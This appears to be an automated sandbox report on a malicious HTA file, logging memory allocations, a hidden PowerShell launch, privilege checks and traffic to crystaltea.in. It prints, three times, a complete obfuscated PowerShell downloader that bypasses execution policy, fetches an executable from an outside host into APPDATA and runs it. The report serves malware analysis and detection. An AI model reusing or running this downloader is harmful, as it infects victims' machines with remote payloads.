NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02548000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02549000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x049ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:42 p.m.	process_identifier: 2144 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$eF=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};function YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(40165,40177,40177,40173,40176,40119,40108,40108,40160,40175,40182,40176,40177,40158,40169,40177,40162,40158,40107,40166,40171,40108,40160,40165,40166,40171,40108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.exe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;

cmdline

powershell.exe -ExecutionPolicy UnRestricted function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$eF=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};function YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(40165,40177,40177,40173,40176,40119,40108,40108,40160,40175,40182,40176,40177,40158,40169,40177,40162,40158,40107,40166,40171,40108,40160,40165,40166,40171,40108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.exe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF;

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 9, 2023, 6:42 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function pYSLE($V, $Q){[IO.File]::WriteAllBytes($V, $Q)};function cdKJpBF($V){if($V.EndsWith((XYgDFbuR @(40107,40161,40169,40169))) -eq $True){Start-Process (XYgDFbuR @(40175,40178,40171,40161,40169,40169,40112,40111,40107,40162,40181,40162)) $V}else{Start-Process $V}};function CNyWMYuz($Xt){$JI = New-Object (XYgDFbuR @(40139,40162,40177,40107,40148,40162,40159,40128,40169,40166,40162,40171,40177));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Q = $JI.DownloadData($Xt);return $Q};function XYgDFbuR($TO){$eF=40061;$VN=$Null;foreach($HA in $TO){$VN+=[char]($HA-$eF)};return $VN};function YuPMhMlF(){$fEikKtIVl = $env:APPDATA + '\';$LDTlYDCLf = CNyWMYuz (XYgDFbuR @(40165,40177,40177,40173,40176,40119,40108,40108,40160,40175,40182,40176,40177,40158,40169,40177,40162,40158,40107,40166,40171,40108,40160,40165,40166,40171,40108,40109,40118,40117,40107,40162,40181,40162));$StIlhBZc = $fEikKtIVl + '098.exe';pYSLE $StIlhBZc $LDTlYDCLf;cdKJpBF $StIlhBZc;;;;}YuPMhMlF; filepath: powershell.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 9, 2023, 6:42 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (2 events)

Data sent	pldZ³Æï È¼ÕèçxYÏÖV\|ÛÞDR6i/5 ÀÀÀ À 28+ÿ crystaltea.in
Data sent	pldZN×½PSëLçrÀþõ¿WàZ"`zEÔ=2/5 ÀÀÀ À 28+ÿ crystaltea.in

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 9, 2023, 6:42 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send May 9, 2023, 6:42 p.m.	buffer: pldZ³Æï È¼ÕèçxYÏÖV\|ÛÞDR6i/5 ÀÀÀ À 28+ÿ crystaltea.in socket: 1436 sent: 117	1	117	0
send May 9, 2023, 6:42 p.m.	buffer: pldZN×½PSëLçrÀþõ¿WàZ"`zEÔ=2/5 ÀÀÀ À 28+ÿ crystaltea.in socket: 1436 sent: 117	1	117	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\Users\test22\AppData\Roaming\098.exe

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

098.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All